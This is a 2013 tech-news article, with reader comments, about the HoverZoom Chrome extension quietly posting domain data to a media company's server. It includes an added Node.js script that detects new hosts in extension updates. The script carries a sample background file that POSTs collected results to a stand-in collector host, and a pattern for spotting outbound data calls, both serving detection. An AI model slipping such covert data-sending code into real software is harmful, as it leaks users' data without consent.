Beware: HoverZoom extension for Chrome turns evil - gHacks Tech News


Extensions should not be modified in key aspects without existing users being made aware of the changes.

We have already seen how companies take advantage of Mozilla's add-on repository by approaching add-on developers to purchase their extensions, or to have them modify the extensions to gather data or implement money-making schemes.

Today it became known that the author of the popular HoverZoom extension for the Google Chrome browser has also implemented "features" in the extension that many users would certainly consider unethical if they knew about them.

A user of the extension noticed that it was acting up when connections to GitHub were made. After additional users reported the same issue, one user wanted to know why HoverZoom needed to POST to a Czech media company server (http://advisormedia.cz/).


The author's reply confirmed that he had agreed to enter a partnership with the company. According to his post, the script detects unused domain names and posts that information to the media company's site.

"This script was added after a partnership has been established with a media consulting company. It detects unused domain names and posts the results to their site. The collected data is strictly anonymous."

HoverZoom is a popular extension for the Chrome browser. The Chrome Web Store lists more than 761,000 users, and reviews of it have been outright positive until now. The most recent reviews, on the other hand, highlight the issue and rate the extension with one star.

What needs to be mentioned in this regard is that the new version, the one with the domain checking, was accepted into the Web Store, which should be a concern for all users of the store. Is it the only extension for Chrome that does that, or did the Czech company contact other extension developers as well to get them to add a similar script to their extensions?

A free fork of the extension has been created by a Reddit user. Hover Free is basically the same extension, but without the domain checking part or other features the original author may have implemented into it lately.

Update: Hover Free is no longer available. It is not clear why that is the case.

We can learn a couple of things from this though. First, companies exploit not only the Mozilla store but also the Chrome Web Store by making monetary offers to extension developers, and second, the scripts that get integrated into these extensions do not seem to be detected by reviews. This is not very reassuring, as there is not really anything that regular users can do to detect this in their extensions.
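The change described above is an update that starts contacting a server the previous version never used. As an added example (not code from the extension or from this article), the following Node.js script compares the script files of two versions of an extension and lists the hosts that appear only in the newer one, flagging those named in a file that also sends data out. The file names, hosts and sources are constructed samples.

```javascript
// Added example: list hosts that an extension update newly references.
// All inputs below are constructed samples, not code from any real extension.
const URL_RE = /\bhttps?:\/\/([a-z0-9.-]+)/gi;
// Calls that send data out of the browser (POST via XHR, fetch, sendBeacon, jQuery).
const SEND_RE = /\.open\(\s*["']POST["']|\bfetch\s*\(|sendBeacon\s*\(|\$\.post\s*\(/i;

// Map every host named in a URL literal to the set of files that mention it.
function hostsIn(files) {
  const found = new Map();
  for (const [name, source] of Object.entries(files)) {
    for (const m of source.matchAll(URL_RE)) {
      const host = m[1].toLowerCase().replace(/\.$/, "");
      if (!found.has(host)) found.set(host, new Set());
      found.get(host).add(name);
    }
  }
  return found;
}

// Report hosts present in the new version but absent from the old one.
function newHosts(oldFiles, newFiles) {
  const before = hostsIn(oldFiles);
  const report = [];
  for (const [host, names] of hostsIn(newFiles)) {
    if (before.has(host)) continue;
    const files = [...names].sort();
    const sendsData = files.some((f) => SEND_RE.test(newFiles[f]));
    report.push({ host, files, sendsData });
  }
  return report.sort((a, b) => a.host.localeCompare(b.host));
}

// Constructed "before" and "after" versions (file name -> source text).
const v1 = {
  "content.js": 'var full = "http://img.example.test/full/" + id;',
};
const v2 = {
  "content.js": 'var full = "http://img.example.test/full/" + id;',
  "background.js":
    'var x = new XMLHttpRequest();\n' +
    'x.open("POST", "http://collector.example.test/report");\n' +
    'x.send(JSON.stringify(results));',
  "options.js": 'var help = "https://docs.example.test/faq";',
};

console.log(newHosts(v1, v2));
```

The check only sees hosts written out as URL literals; a host assembled at run time or loaded from a remote configuration does not appear in the report.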

Update: The author of the original HoverZoom extension has implemented a switch in the settings which blocks anonymous usage statistics from being sent. There is no direct alternative for Chrome, but you can use the userscript Mouseover Popup Image Viewer instead, which offers a similar feature set.






    Comments

    1. trabbel said on March 5, 2013 at 4:17 am

      hey martin, many thanks for letting us know! :)

    2. funix said on March 5, 2013 at 4:37 am

      Thanks for the information and bringing up the fork for exchange. Without that alternative I may have said “meh, whatever”.

    3. happycommenter said on March 5, 2013 at 8:06 am

      Interesting they don’t have this problem with Internet Explorer.

    4. Raton said on March 5, 2013 at 9:45 am
      1. Martin Brinkmann said on March 5, 2013 at 10:05 am

        Thanks, have updated the article.

    5. blue_bsod said on March 5, 2013 at 11:05 am

      @happycommenter: When it comes to free add-ons, Firefox and Chrome come to mind first. MSIE had very few add-ons, and most were either junk, trials, or required payment to use. Even with the current MSIE 10, there is only less than two handfuls of available free add-ons. Whereas the market goes towards Firefox, which was released with add-ons, and then later Chrome. Of course MSIE doesn’t have this problem because they have less than 0.0001% of the market when it comes to add-ons. Advertisers would be stupid to go after add-ons for a browser with only 0.0001% of the market. It doesn’t make MSIE better because of that. What MSIE lacks in every department, Firefox and Chrome can make up and exceed your expectations using add-ons. MSIE is full of holes, can be exploited, has poor security, slow, resource hog, crippled and more…

    6. trekker said on March 5, 2013 at 2:00 pm

      ***Thank you*** for this useful alert, Martin!

      Pls, keep posting
      about suspicious FF addons, too
      …as you’ve done in the past.

      I wish,
      a user-friendly detection mechanism or guidelines
      existed to detect “rogue” addon behavior,
      (An easy way for those of us who are not techie users).

      Meanwhile, I rely on Ghacks.

    7. Jojo said on March 5, 2013 at 3:13 pm

      There is a nice Android monitor app I run that shows you all the changes made to an app when it is updated.

      Of course, if the developer doesn’t publish the changes, then the app won’t show anything.
      ==========
      Description

      Are you tired of going through every updated application on the Play Store to see what the developer has changed? Changelog Droid solves this problem by fetching all the information directly from the Play Store after or before you update them.

      https://play.google.com/store/apps/details?id=com.cypressworks.changelogviewer&feature=nav_result#

      1. Martin Brinkmann said on March 5, 2013 at 3:15 pm

        I reviewed this or a similar application some time ago, can’t remember right now which it was. It would probably not have helped in this case though.

    8. batman said on March 9, 2013 at 9:23 am

      I love how developers like this, build on a FREE browser, but somehow feel that they should make money.

    9. blue_bsod said on April 5, 2013 at 2:45 pm

      Photo Zoom for Facebook is better and lists over 4M users. Has extensions for Chrome, Firefox, and Safari, and has no ads, no tracking, no silly 3rd party scripts of off site extensions.

      http://www.regisgaughan.com/fbphotozoom/

    10. author said on October 18, 2013 at 3:49 pm

      Hover Free is not available.

      1. Martin Brinkmann said on October 18, 2013 at 6:15 pm

        Thanks for letting me know about that. I have updated the article.

    11. gorankx said on February 14, 2014 at 5:06 pm

      There is Imagus, which is also recommended by Hover Free.
